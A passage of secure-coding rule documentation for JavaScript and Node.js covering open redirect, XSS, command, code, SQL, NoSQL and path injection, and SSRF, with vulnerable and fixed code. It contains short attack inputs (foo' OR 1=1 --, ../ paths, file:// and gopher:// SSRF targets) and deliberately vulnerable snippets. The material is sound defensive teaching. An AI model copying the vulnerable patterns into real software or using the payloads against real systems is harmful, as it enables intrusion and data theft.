The proposed compliant solution makes use of the execa method. This one separates the command to run from the arguments passed to it. It also ensures that all arguments passed to the executed command are properly escaped. That way, an attacker with control over a command parameter will not be able to inject arbitrary new ones.

While this reduces the chances for an attacker to identify an exploitation payload, the highest security level will only be reached by adding an additional validation layer.

In the current example, an attacker with control over the first parameter of the find command could still be able to inject special file path characters in it. Indeed, passing ../../ string as a parameter would force the find command to crawl the whole file system. This could lead to a denial of service or sensitive data exposure.

Here, adding a regular-expression-based validation on the user-controled value prevents this kind of issue. It ensures that the user-submitted parameter contains a harmless value.

Resources

Documentation

Standards

jssecurity:S5146

Why is this an issue?

Open redirection occurs when an application uses user-controllable data to redirect users to a URL.

An attacker with malicious intent could manipulate a user to browse into a specially crafted URL, such as https://trusted.example.com?url=evil.example.com, to redirect the victim to his evil domain.

Tricking users into sending the malicious HTTP request is usually the main task of exploiting an open redirection. Often, it requires an attacker to build a credible pretext to prevent suspicions from the victim.

Attackers commonly use open redirect exploits in mass phishing campaigns.

What is the potential impact?

If an attacker tricks a user into opening a link of his choice, the user is redirected to a domain controlled by the attacker.

From then on, the attacker can perform various malicious actions, some more impactful than others.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Domain Mirroring

A malicious link redirects to an attacker’s controlled website mirroring the interface of a web application trusted by the user. Due to the similarity in the application appearance and the apparently trustable clicked hyperlink, the user struggles to identify that they are browsing on a malicious domain.

Depending on the attacker’s purpose, the malicious website can leak credentials, bypass Multi-Factor Authentication (MFA), and reach any authenticated data or action.

Malware Distribution

A malicious link redirects to an attacker’s controlled website that serves malware. On the same basis as the domain mirroring exploitation, the attacker develops a spearphishing or phishing campaign with a carefully crafted pretext that would result in the download and potential execution of a hosted malicious file.
The worst-case scenario could result in complete system compromise.

How to fix it in Express.js

Code examples

The following noncompliant code example is vulnerable to open redirection as it constructs a URL with user-controllable data. This URL is then used to redirect the user without being first validated. An attacker can leverage this to manipulate users into performing unwanted redirects.

Noncompliant code example

server.get('/redirect', (request, response) => {

   response.redirect(request.query.url); // Noncompliant
});

Compliant solution

server.get('/redirect', (request, response) => {

   if (request.query.url.startsWith("https://www.example.com/")) {
      response.redirect(request.query.url);
   }
});

How does this work?

Built-in framework methods should be preferred as, more often than not, these provide additional security mechanisms. Usually, these built-in methods are engineered for internal page redirections. Thus, they might not be the solution for the reader’s use case.

In case the application strictly requires external redirections based on user-controllable data, this could be done using the following alternatives:

  1. Validating the authority part of the URL against a statically defined value (see Pitfalls).
  2. Using an allow-list approach in case the destination URLs are multiple but limited.
  3. Adding a customized page to which users are redirected, warning about the imminent action and requiring manual authorization to proceed.

Pitfalls

The trap of 'StartsWith' and equivalents

When validating untrusted URLs by checking if they start with a trusted scheme and authority pair scheme://authority, ensure that the validation string contains a path separator / as the last character.

If the validation string does not contain a terminating path separator, the Open Redirect vulnerability remains; only the exploitation technique changes.

Thus, a validation like startsWith("https://example.com") or an equivalent with the regex ^https://example\.com.* can be exploited with the following URL https://example.com.malicious.io. The practice of taking over domains that maliciously look like existing domains is widespread and is called Cybersquatting.

Resources

Standards

jssecurity:S5696

Why is this an issue?

DOM-based cross-site scripting (XSS) occurs in a web application when its client-side logic reads user-controllable data, such as the URL, and then uses this data in dangerous functions defined by the browser, such as eval(), without sanitizing it first.

When well-intentioned users open a link to a page vulnerable to DOM-based XSS, they are exposed to several attacks targeting their browsers.

What is the potential impact?

A well-intentioned user opens a malicious link that injects data into the web application. This data can be text, but also arbitrary code that can be interpreted by the user’s browser, such as HTML, CSS, or JavaScript.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting this vulnerability.

Website defacement

An attacker can use the vulnerability to change the target web application’s content as they see fit. Therefore, they might replace the website’s original content with inappropriate content, leading to brand and reputation damage for the web application owner. It could additionally be used in phishing campaigns, leading to the potential loss of user credentials.

User impersonation

When a user is logged into a web application and opens a malicious link, the attacker can steal that user’s web session and carry out unauthorized actions on their account. If the credentials of a privileged user (such as an administrator) are stolen, the attacker might be able to compromise all of the web application’s data.

Theft of sensitive data

Cross-site scripting allows an attacker to extract the application data of any user that opens their malicious link. Depending on the application, this can include sensitive data such as financial or health information. Furthermore, by injecting malicious code into the web application, it might be possible to record keyboard activity (keylogger) or even request access to other devices, such as the camera or microphone.

Chaining XSS with other vulnerabilities

In many cases, bug hunters and attackers can use cross-site scripting vulnerabilities as a first step to exploit more dangerous vulnerabilities.

For example, suppose that the admin control panel of a web application contains an SQL injection vulnerability. In this case, an attacker could find an XSS vulnerability and send a malicious link to an administrator. Once the administrator opens the link, the SQL injection is exploited, giving the attacker access to all user data stored in the web application.

How to fix it in DOM API

Code examples

The following code is vulnerable to DOM-based cross-site scripting because it uses unsanitized URL parameters to alter the DOM of its webpage.

Because the user input is not sanitized here and the used DOM property is vulnerable to XSS, it is possible to inject arbitrary code in the user’s browser through this example.

Noncompliant code example

The Element.innerHTML property is used to replace the contents of the root element with user-supplied contents. The innerHTML property does not sanitize its input, thus allowing for code injection.

const rootEl = document.getElementById('root');
const queryParams = new URLSearchParams(document.location.search);
const input = queryParams.get("input");

rootEl.innerHTML = input; // Noncompliant

Compliant solution

The HTMLElement.innerText property does not create DOM elements out of its input, rather treating its input as a string. This makes it a safe alternative to Element.innerHTML depending on the use case.

const rootEl = document.getElementById('root');
const queryParams = new URLSearchParams(document.location.search);
const input = queryParams.get("input");

rootEl.innerText = input;

How does this work?

In general, one should limit the use of dangerous properties and methods, such as Element.innerHTML or Document.write(), as there exist many ways for an attacker to exploit their usage. Instead, prefer the usage of safe alternatives such as HTMLElement.innerText or Node.textContent. Furthermore, frameworks such as React or Vue.js will automatically escape variables used in views, making it much harder to accidentally write vulnerable code.

If these options are not possible, sanitization of the attacker-controllable input should be preferred.

Sanitization of user-supplied data

By systematically encoding data that is written to the DOM, it is possible to prevent XSS attacks. In this case, the goal is to leave the data intact from the end user’s point of view but make it uninterpretable by web browsers.

However, selecting an encoding that is guaranteed to be safe can be a complex task. XSS exploitation techniques vary depending on the HTML context where malicious input is injected. As a result, a combination of HTML encoding, URL encoding and JavaScript escaping may be required, depending on the context. OWASP’s DOM-based XSS Prevention Cheat Sheet goes into more detail about the required sanitization.

Though browsers do not yet provide any direct API to do this sanitization, the DOMPurify library offers extensive functionality to prevent XSS and has been tested by a large user base.

Pitfalls

The limits of validation

Validation of user inputs is a good practice to protect against various injection attacks. But for XSS, validation on its own is not the recommended approach.

For example, filtering out user inputs based on a denylist will never fully prevent XSS vulnerabilities from being exploited. This practice is sometimes used by web application firewalls. Time and time again, malicious users are able to find the exploitation payload that will defeat the filters of these firewalls.

Another common approach is to parse HTML and strip sensitive HTML tags. Again, this denylist approach is vulnerable by design: maintaining a list of sensitive HTML tags is very difficult in the long run.

Modification after sanitization

Caution should be taken if the user-supplied data is further modified after this data was sanitized. Doing so might void the effects of sanitization and introduce new XSS vulnerabilities. In general, modification of this data should occur beforehand instead.

Going the extra mile

Content Security Policy

With a defense-in-depth security approach, a Content Security Policy (CSP) can be added through the Content-Security-Policy HTTP header, or using a <meta> element. The CSP aims to mitigate XSS attacks by instructing client browsers not to load data that does not meet the application’s security requirements.

Server administrators can define an allowlist of domains that contain valid scripts, which will prevent malicious scripts (not stored on one of these domains) from being executed. If script execution is not needed on a certain webpage, it can also be blocked altogether.

Resources

Documentation

Articles & blog posts

Standards

jssecurity:S2076

Why is this an issue?

OS command injections occur when applications build command lines from untrusted data before executing them with a system shell.
In that case, an attacker can tamper with the command line construction and force the execution of unexpected commands. This can lead to the compromise of the underlying operating system.

What is the potential impact?

An attacker exploiting an OS command injection vulnerability will be able to execute arbitrary commands on the underlying operating system.

The impact depends on the access control measures taken on the target system OS. In the worst-case scenario, the process runs with root privileges, and therefore any OS commands or programs may be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Denial of service and data leaks

In this scenario, the attack aims to disrupt the organization’s activities and profit from data leaks.

An attacker could, for example:

  • download the internal server’s data, most likely to sell it
  • modify data, send malware
  • stop services or exhaust resources (with fork bombs for example)

This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker also manages to elevate their privileges to an administrative level and attacks other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised by a combination of OS injections and misconfiguration of:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in Node.js

Code examples

The following code is vulnerable to command injections because it is using untrusted inputs to set up a new process. Therefore an attacker can execute an arbitrary program that is installed on the system.

Noncompliant code example

const { execSync } = require('child_process')

cmd = req.query.cmd
execSync(cmd) // Noncompliant

Compliant solution

const { spawnSync } = require('child_process')

const cmdId = parseInt(req.query.cmdId)
let host = req.query.host
host = typeof host === "string"? host : "example.org"

const allowedCommands = [
    {exe:"/bin/ping", args:["-c","1","--"]},
    {exe:"/bin/host", args:["--"]}
]
const cmd = allowedCommands[cmdId]
spawnSync(cmd.exe, cmd.args.concat(host))

How does this work?

Allowing users to execute operating system commands generally creates more problems than it solves.

Anything that can be done via operating system commands can usually be done via a language’s native SDK.
Therefore, our first suggestion is to avoid using OS commands in the first place.
However, if the application requires running OS commands with user-controlled data, here are some security suggestions.

Pre-Approved commands

If the application aims to execute only a small number of OS commands (for example, ls, pwd, and grep), the cleanest way to avoid this problem is to validate the input before using it in an OS command.

Create a list of authorized and secure commands that you want the application to be able to execute. Use absolute paths to avoid any ambiguity.
If a user input does not match an entry in this list, it should be rejected because it is considered unsafe.

Depending on the number of commands you want the application to support, the list can be either a regex string or any array type. If you use regexes, choose simple regexes to avoid ReDOS attacks. For example, you can accept only a specific set of executables, by using ^/bin/(ls|pwd|grep)$.

Important note: The application must do validation on the server side. Not on client-side front-ends.

In the example compliant code, a static list of trusted commands is used. Users are only allowed to submit an index in this array in place of a full command name.

Neutralize special characters

If the application is to execute complex commands that cannot be controlled thanks to pre-approved lists, the cleanest approach is to use special sanitization components, such as child_process.spawn.

The library helps you to get rid of common dangerous characters, such as:

  • &
  • |
  • ;
  • $
  • >
  • <
  • \`
  • \\
  • !

If user input is to be included in the arguments of a command, the application must ensure that dangerous options or argument delimiters are neutralized.
Argument delimiters count ', - and spaces.

For example, the find command from UNIX supports the dangerous argument -exec.
In this case, option processing can be terminated with a string containing -- or with special options. For example, git supports --end-of-options since its version 2.24.

In the example compliant code, the spawn function from child_process is used in place of its less secure exec counterpart. It accepts command arguments as an array and performs a proper escaping of its element before building the command line to run.

Disable shell integration

In most cases, command execution libraries propose two ways to execute external program: with or without shell integration.

When shell integration is allowed, an attacker with control over the command arguments can simply execute additional external programs using system shell features. For example, on Unix, command pipelining (|) or string interpolation ($(), <(), etc.) can be used to break out of a command call.

Therefore, it is generally preferable to disable shell integration.

The spawn function that is used in the example compliant code disables shell integration by default.

Pitfalls

Loose typing

Because JavaScript is a loosely typed language, extra care should be taken when accepting user-controlled parameters. Indeed, some methods, that can be used to sanitize untrusted parameters, sometimes accept both objects and object arrays.

For example, the Array.concat function accepts an array as argument and will append all of its elements to its target. When an untrusted parameter is an array, while a single string was expected, using concat to build a command argument list can result in an arbitrary argument injection.

It is therefore of prime importance to check the type of untrusted parameters before processing them.

In the above compliant code example, the ambiguous concat function is used. However, a type check has been introduced to prevent any unexpected issue.

Resources

Documentation

Standards

jssecurity:S6105

Why is this an issue?

Open redirection occurs when an application uses user-controllable data to build URLs used during redirects.

An attacker with malicious intent could manipulate a user to browse into a specially crafted URL, such as https://trusted.example.com/redirect?url=evil.com, to redirect the victim to their evil domain.

Open redirection is most often used to trick users into browsing to a malicious domain that they believe is safe. As such, attackers commonly use open redirect exploits in mass phishing campaigns.

What is the potential impact?

An attacker can use this vulnerability to redirect a user from a trusted domain to a malicious domain controlled by the attacker. At that point, the attacker can perform various attacks, such as phishing.

Below are some scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Phishing

Suppose the attacker creates a malicious website that mirrors the interface of the trusted website. In that case, they can use the open redirect vulnerability to lead the user to this malicious site.

Due to the similarity in the application appearance and the supposedly trustable hyperlink, the user fails to identify that they are browsing on a malicious domain. From here, an attacker can capture the user’s credentials, bypass Multi-Factor Authentication (MFA), and take over the user’s account on the trusted website.

Malware distribution

By leveraging the domain mirroring technique explained above, the attacker could also create a website that hosts malware. A user who is unaware of the redirection from a trusted website to this malicious website might then download and execute the attacker’s malware. In the worst case, this can lead to a complete system compromise for the user.

JavaScript injection (XSS)

In certain circumstances, an attacker can use DOM-based open redirection to execute JavaScript code. This can lead to further exploitation in the trusted domain and has consequences such as the compromise of the user’s account.

How to fix it in DOM API

Code examples

The following noncompliant code example is vulnerable to open redirection as it constructs a URL with user-controllable data. This URL is then used to redirect the user without being first validated. An attacker can leverage this to manipulate users into performing unwanted redirects.

Noncompliant code example

The following example is vulnerable to open redirection through the following URL: https://example.com/redirect?url=https://evil.com;

const queryParams = new URLSearchParams(document.location.search);
const redirectUrl = queryParams.get("url");
document.location = redirectUrl; // Noncompliant

Compliant solution

const queryParams = new URLSearchParams(document.location.search);
const redirectUrl = queryParams.get("url");

if (redirectUrl.startsWith("https://www.example.com/")) {
    document.location = redirectUrl;
}

How does this work?

Most client-side frameworks, such as Vue.js or React.js, provide built-in redirection methods. Those should be preferred as they often provide additional security mechanisms. However, these built-in methods are usually engineered for internal page redirections. Thus, they might not solve the reader’s use case.

In case the application strictly requires external redirections based on user-controllable data, the following should be done instead:

  1. Validating the authority part of the URL against a statically defined value (see Pitfalls.)
  2. Using an allowlist approach in case the destination URLs are multiple but limited.
  3. Adding a dynamic confirmation dialog, warning about the imminent action and requiring manual authorization to proceed to the actual redirection.

Pitfalls

The trap of String.startsWith and equivalents

When validating untrusted URLs by checking if they start with a trusted scheme and authority pair scheme://authority, ensure that the validation string contains a path separator character (i.e., a /) as the last character.

When this character is not present, attackers may be able to register a specific domain name that both passes validation and is controlled by them.

For example, when validating the https://example.com domain, suppose an attacker owns the https://example.evil domain. If the prefix-based validation is implemented incorrectly, they could create a https://example.com.example.evil subdomain to abuse the broken validation.

The practice of taking over domains that maliciously look like existing domains is widespread and is called cybersquatting.

Resources

Standards

jssecurity:S5147

Why is this an issue?

NoSQL injections occur when an application retrieves untrusted data and inserts it into a database query without sanitizing it first.

What is the potential impact?

In the context of a web application that is vulnerable to NoSQL injection:
After discovering the injection point, attackers insert data into the vulnerable field to execute malicious commands in the affected databases.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Identity spoofing and data leakage

In the context of simple query logic breakouts, a malicious database query enables privilege escalation or direct data leakage from one or more databases.
This threat is the most widespread impact.

Data deletion and denial of service

The malicious query makes it possible for the attacker to delete data in the affected databases.
This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP) as missing data can disrupt the regular operations of an organization.

Chaining NoSQL injections with other vulnerabilities

Attackers who exploit NoSQL injections rely on other vulnerabilities to maximize their profits.
Most of the time, organizations overlook some defense in depth measures because they assume attackers cannot reach certain points in the infrastructure. This misbehavior can lead to multiple attacks with great impact:

  • When secrets are stored unencrypted in databases: Secrets can be exfiltrated and lead to compromise of other components.
  • If server-side OS and/or database permissions are misconfigured, injection can lead to remote code execution (RCE).

How to fix it in MongoDB

Code examples

The following code is vulnerable to a NoSQL injection because the database query is built using untrusted JavaScript objects that are extracted from user inputs.

Here the application assumes the user-submitted parameters are always strings, while they might contain more complex structures. An array or dictionary input might tamper with the expected query behavior.

Noncompliant code example

const { MongoClient } = require('mongodb');

function (req, res) {
    let query = { user: req.query.user, city: req.query.city };

    MongoClient.connect(url, (err, db) => {
        db.collection("users")
        .find(query) // Noncompliant
        .toArray((err, docs) => { });
    });
}

Compliant solution

const { MongoClient } = require('mongodb');

function (req, res) {
    let query = { user: req.query.user.toString(), city: req.query.city.toString() };

    MongoClient.connect(url, (err, db) => {
        db.collection("users")
        .find(query)
        .toArray((err, docs) => { });
    });
}

How does this work?

Use only plain string values

With MongoDB, NoSQL injection can arise when attackers are able to inject objects in the query instead of plain string values. For example, using the object { $ne: "" } in a field of a find query, will return every entry where the field is not empty.

Some JavaScript application servers enable "extended" syntax that serializes URL query parameters into JavaScript objects or arrays. This allows attackers to control all the fields of an object. In express.js, this "extended" syntax is enabled by default.

Before using any untrusted value in a MongoDB query, make sure it is a plain string and not a JavaScript object or an array.

In some cases, this will not be enough to protect against all attacks and strict validation needs to be applied (see the "Pitfalls" section)

Pitfalls

Code execution

When untrusted data is used within query operators such as $where, $accumulator, or $function it usually results in JavaScript code execution vulnerabilities.

Therefore, untrusted values should not be used inside these query operators unless they are properly validated.

For more information about MongoDB code execution vulnerabilities, see rule S5334.

Resources

Articles & blog posts

Standards

jssecurity:S5334

Why is this an issue?

Code injections occur when applications allow the dynamic execution of code instructions from untrusted data.
An attacker can influence the behavior of the targeted application and modify it to get access to sensitive data.

What is the potential impact?

An attacker exploiting a dynamic code injection vulnerability will be able to execute arbitrary code in the context of the vulnerable application.

The impact depends on the access control measures taken on the target system OS. In the worst-case scenario, the process that executes the code runs with root privileges, and therefore any OS commands or programs may be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Denial of service and data leaks

In this scenario, the attack aims to disrupt the organization’s activities and profit from data leaks.

An attacker could, for example:

  • download the internal server’s data, most likely to sell it
  • modify data, send malware
  • stop services or exhaust resources (with fork bombs for example)

This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker also manages to elevate their privileges to an administrative level and attacks other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised by a combination of code injections and misconfiguration of:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in Node.js

Code examples

The following code is vulnerable to arbitrary code execution because it dynamically runs JavaScript code built from untrusted data.

Noncompliant code example

function (req, res) {
    let operation = req.query.operation
    eval(`product_${operation}()`) // Noncompliant
    res.send("OK")
}

Compliant solution

const allowed = ["add", "remove", "update"]

let operationId = req.query.operationId
const operation = allowed[operationId]
eval(`product_${operation}()`)
res.send("OK")

How does this work?

Allowing users to execute code dynamically generally creates more problems than it solves.

Anything that can be done via dynamic code execution can usually be done via a language’s native SDK and static code.
Therefore, our suggestion is to avoid executing code dynamically.
If the application requires the execution of dynamic code, additional security measures must be taken.

Dynamic parameters

When the untrusted values are only expected to be values used in standard processing, it is generally possible to provide them as parameters of the dynamic code. In that case, care should be taken to ensure that only the name of the untrusted parameter is passed to the dynamic code and not that its value is expanded into it. After that, the dynamic code will be able to safely access the untrusted parameter content and perform the processing.

Allow list

When the untrusted parameters are expected to contain operators, function names or other reflection-related values, best practices would encourage using an allow list. This one would contain a list of accepted safe values that can be used as part of the dynamic code.

When receiving an untrusted parameter, the application would verify its value is contained in the configured allow list. If it is present, the parameter is accepted. Otherwise, it is rejected and an error is raised.

Another similar approach is using a binding between identifiers and accepted values. That way, users are only allowed to provide identifiers, where only valid ones can be converted to a safe value.

The example compliant code uses such a binding approach.

Resources

Articles & blog posts

Standards

jssecurity:S3649

Why is this an issue?

Database injections (such as SQL injections) occur in an application when the application retrieves data from a user or a third-party service and inserts it into a database query without sanitizing it first.

If an application contains a database query that is vulnerable to injections, it is exposed to attacks that target any database where that query is used.

A user with malicious intent carefully performs actions whose goal is to modify the existing query to change its logic to a malicious one.

After creating the malicious request, the attacker can attack the databases affected by this vulnerability without relying on any pre-requisites.

What is the potential impact?

In the context of a web application that is vulnerable to SQL injection:
After discovering the injection, attackers inject data into the vulnerable field to execute malicious commands in the affected databases.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Identity spoofing and data manipulation

A malicious database query enables privilege escalation or direct data leakage from one or more databases. This threat is the most widespread impact.

Data deletion and denial of service

The malicious query makes it possible for the attacker to delete data in the affected databases.
This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Chaining DB injections with other vulnerabilities

Attackers who exploit SQL injections rely on other vulnerabilities to maximize their profits.
Most of the time, organizations overlook some defense in depth measures because they assume attackers cannot reach certain points in the infrastructure. This misbehavior can lead to multiple attacks with great impact:

  • When secrets are stored unencrypted in databases: Secrets can be exfiltrated and lead to compromise of other components.
  • If server-side OS and/or database permissions are misconfigured, injection can lead to remote code execution (RCE).

How to fix it in Sequelize

Code examples

The following code is an example of an overly simple authentication function. It is vulnerable to SQL injection because user-controlled data is inserted directly into a query string: The application assumes that incoming data always has a specific range of characters, and ignores that some characters may change the query logic to a malicious one.

In this particular case, the query can be exploited with the following string:

foo' OR 1=1 --

By adapting and inserting this template string into one of the fields (user or pass), an attacker would be able to log in as any user within the scoped user table.

Noncompliant code example

async function index(req, res) {
    const { db, User } = req.app.get('sequelize');

    let loggedInUser = await db.query(
        `SELECT * FROM users WHERE user = '${req.query.user}' AND pass = '${req.query.pass}'`,
        {
            model: User,
        }
    ); // Noncompliant

    res.send(JSON.stringify(loggedInUser));
    res.end();
}}

Compliant solution

async function index(req, res) {
    const { db, User, QueryTypes } = req.app.get('sequelize');

    let user = req.query.user;
    let pass = req.query.pass;

    let loggedInUser = await db.query(
        `SELECT * FROM users WHERE user = $user AND pass = $pass`,
        {
            bind: {
                user: user,
                pass: pass,
            },
            type: QueryTypes.SELECT,
            model: User,
        }
    );

    res.send(JSON.stringify(loggedInUser));
    res.end();
}

How does this work?

Use prepared statements

As a rule of thumb, the best approach to protect against injections is to systematically ensure that untrusted data cannot break out of an interpreted context.

For database queries, prepared statements are a natural mechanism to achieve this due to their internal workings.
Here is an example with the following query string (Java SE syntax):

SELECT * FROM users WHERE user = ? AND pass = ?

Note: Placeholders may take different forms, depending on the library used. For the above example, the question mark symbol '?' was used as a placeholder.

When a prepared statement is used by an application, the database server compiles the query logic even before the application passes the literals corresponding to the placeholders to the database.
Some libraries expose a prepareStatement function that explicitly does so, and some do not - because they do it transparently.

The compiled code that contains the query logic also includes the placeholders: they serve as parameters.

After compilation, the query logic is frozen and cannot be changed.
So when the application passes the literals that replace the placeholders, they are not considered application logic by the database.

Consequently, the database server prevents the dynamic literals of a prepared statement from affecting the underlying query, and thus sanitizes them.

On the other hand, the application does not automatically sanitize third-party data (for example, user-controlled data) inserted directly into a query. An attacker who controls this third-party data can cause the database to execute malicious code.

Resources

Articles & blog posts

Standards

jssecurity:S5131

This vulnerability makes it possible to temporarily execute JavaScript code in the context of the application, granting access to the session of the victim. This is possible because user-provided data, such as URL parameters, are copied into the HTML body of the HTTP response that is sent back to the user.

Why is this an issue?

Reflected cross-site scripting (XSS) occurs in a web application when the application retrieves data like parameters or headers from an incoming HTTP request and inserts it into its HTTP response without first sanitizing it. The most common cause is the insertion of GET parameters.

When well-intentioned users open a link to a page that is vulnerable to reflected XSS, they are exposed to attacks that target their own browser.

A user with malicious intent carefully crafts the link beforehand.

After creating this link, the attacker must use phishing techniques to ensure that his target users click on the link.

What is the potential impact?

A well-intentioned user opens a malicious link that injects data into the web application. This data can be text, but it can also be arbitrary code that can be interpreted by the target user’s browser, such as HTML, CSS, or JavaScript.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Vandalism on the front-end website

The malicious link defaces the target web application from the perspective of the user who is the victim. This may result in loss of integrity and theft of the benevolent user’s data.

Identity spoofing

The forged link injects malicious code into the web application. The code enables identity spoofing thanks to cookie theft.

Record user activity

The forged link injects malicious code into the web application. To leak confidential information, attackers can inject code that records keyboard activity (keylogger) and even requests access to other devices, such as the camera or microphone.

Chaining XSS with other vulnerabilities

In many cases, bug hunters and attackers chain cross-site scripting vulnerabilities with other vulnerabilities to maximize their impact.
For example, an XSS can be used as the first step to exploit more dangerous vulnerabilities or features that require higher privileges, such as a code injection vulnerability in the admin control panel of a web application.

How to fix it in Express.js

Code examples

The following code is vulnerable to cross-site scripting because it returns an HTML response that contains unsanitized user input.

If you do not intend to send HTML code to clients, the vulnerability can be fixed by specifying the type of data returned in the response. For example, you can use the JsonResponse class to safely return JSON messages.

Noncompliant code example

function (req, res) {
    json = JSON.stringify({ "data": req.query.input });
    res.send(json);
};

Compliant solution

function (req, res) {
    res.json({ "data": req.query.input });
};

It is also possible to set the content-type header manually using the content_type parameter when creating an HttpResponse object.

Noncompliant code example

function (req, res) {
    res.send(req.query.input);
};

Compliant solution

function (req, res) {
    res.set('Content-Type', 'text/plain');
    res.send(req.query.input);
};

How does this work?

In case the response consists of HTML code, it is highly recommended to use a template engine like ejs to generate it. This template engine separates the view from the business logic and automatically encodes the output of variables, drastically reducing the risk of cross-site scripting vulnerabilities.

If you do not intend to send HTML code to clients, the vulnerability can be resolved by telling them what data they are receiving with the content-type HTTP header. This header tells the browser that the response does not contain HTML code and should not be parsed and interpreted as HTML. Thus, the HTTP response is not vulnerable to reflected Cross-Site Scripting.

For example, setting the content-type header to text/plain allows to safely reflect user input since browsers will not try to parse and execute the response.

Pitfalls

Content-types

Be aware that there are more content-types than text/html that allow to execute JavaScript code in a browser and thus are prone to cross-site scripting vulnerabilities.
The following content-types are known to be affected:

  • application/mathml+xml
  • application/rdf+xml
  • application/vnd.wap.xhtml+xml
  • application/xhtml+xml
  • application/xml
  • image/svg+xml
  • multipart/x-mixed-replace
  • text/html
  • text/rdf
  • text/xml
  • text/xsl

The limits of validation

Validation of user inputs is a good practice to protect against various injection attacks. But for XSS, validation on its own is not the recommended approach.

As an example, filtering out user inputs based on a deny-list will never fully prevent XSS vulnerability from being exploited. This practice is sometimes used by web application firewalls. It is only a matter of time for malicious users to find the exploitation payload that will defeat the filters.

Another example is applications that allow users or third-party services to send HTML content to be used by the application. A common approach is trying to parse HTML and strip sensitive HTML tags. Again, this deny-list approach is vulnerable by design: maintaining a list of sensitive HTML tags, in the long run, is very difficult.

A preferred option is to use Markdown in conjunction with a parser that removes embedded HTML and restricts the use of "javascript:" URI.

Going the extra mile

Content Security Policy (CSP) Header

With a defense-in-depth security approach, the CSP response header can be added to instruct client browsers to block loading data that does not meet the application’s security requirements. If configured correctly, this can prevent any attempt to exploit XSS in the application.
Learn more here.

Resources

Documentation

Articles & blog posts

Conference presentations

Standards

jssecurity:S5144

Why is this an issue?

Server-Side Request Forgery (SSRF) occurs when attackers can coerce a server to perform arbitrary requests on their behalf.

An SSRF vulnerability can either be basic or blind, depending on whether the server’s fetched data is directly returned in the web application’s response.
The absence of the corresponding response for the coerced request on the application is not a barrier to exploitation and thus must be treated in the same way as basic SSRF.

What is the potential impact?

SSRF usually results in unauthorized actions or data disclosure in the vulnerable application or on a different system it can reach. Conditional to what is reachable, remote command execution can be achieved, although it often requires chaining with further exploitations.

Information disclosure is SSRF’s core outcome. Depending on the extracted data, an attacker can perform a variety of different actions that can range from low to critical severity.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Local file read to host takeover

An attacker manipulates an application into performing a local request for a sensitive file, such as ~/.ssh/id_rsa, by using the File URI scheme file://.
Once in possession of the SSH keys, the attacker establishes a remote connection to the system hosting the web application.

Internal Network Reconnaissance

An attacker enumerates internal accessible ports from the affected server or others to which the server can communicate by iterating over the port field in the URL http://127.0.0.1:{port}.
Taking advantage of other supported URL schemas (dependent on the affected system), for example, gopher://127.0.0.1:3306, an attacker would be able to connect to a database service and perform queries on it.

How to fix it in Node.js

Code examples

The following code is vulnerable to SSRF as it opens a URL defined by untrusted data.

Noncompliant code example

const axios = require('axios');
const express = require('express');

const app = express();

app.get('/example', async (req, res) => {
    try {
        await axios.get(req.query.url); // Noncompliant
        res.send("OK");
    } catch (err) {
        console.error(err);
        res.send("ERROR");
    }
})

Compliant solution

const axios = require('axios');
const express = require('express');

const schemesList = ["http:", "https:"];
const domainsList = ["trusted1.example.com", "trusted2.example.com"];

app.get('/example', async (req, res) => {
    const url = (new URL(req.query.url));

    if (schemesList.includes(url.protocol) && domainsList.includes(url.hostname)) {
        try {
            await axios.get(url);
            res.send("OK");
        } catch (err) {
            console.error(err);
            res.send("ERROR");
        }
    }else {
        res.send("INVALID_URL");
    }
})

How does this work?

The application should avoid opening URLs that are constructed with untrusted data.

When such a feature is strictly necessary, SSRF can be mitigated by applying an allow-list of trustable schemes and domains.

The compliant code example uses such an approach.

Pitfalls

The trap of 'StartsWith' and equivalents

When validating untrusted URLs by checking if they start with a trusted scheme and authority pair scheme://authority, ensure that the validation string contains a path separator / as the last character.

If the validation string does not contain a terminating path separator, the SSRF vulnerability remains; only the exploitation technique changes.

Thus, a validation like startsWith("https://example.com") or an equivalent with the regex ^https://example\.com.* can be exploited with the following URL https://example.commit.malicious.io.

Resources

Standards

jssecurity:S2083

Why is this an issue?

Path injections occur when an application uses untrusted data to construct a file path and access this file without validating its path first.

A user with malicious intent would inject specially crafted values, such as ../, to change the initial intended path. The resulting path would resolve somewhere in the filesystem where the user should not normally have access to.

What is the potential impact?

A web application is vulnerable to path injection and an attacker is able to exploit it.

The files that can be affected are limited by the permission of the process that runs the application. Worst case scenario: the process runs with root privileges on Linux, and therefore any file can be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Override or delete arbitrary files

The injected path component tampers with the location of a file the application is supposed to delete or write into. The vulnerability is exploited to remove or corrupt files that are critical for the application or for the system to work properly.

It could result in data being lost or the application being unavailable.

Read arbitrary files

The injected path component tampers with the location of a file the application is supposed to read and output. The vulnerability is exploited to leak the content of arbitrary files from the file system, including sensitive files like SSH private keys.

How to fix it in Node.js

Code examples

The following code is vulnerable to path injection as it creates a path using untrusted data without validation.

An attacker can exploit the vulnerability in this code to read arbitrary files.

Noncompliant code example

const path = require('path');
const fs   = require('fs');

function (req, res) {
  const targetDirectory = "/data/app/resources/";
  const userFilename = path.join(targetDirectory, req.query.filename);

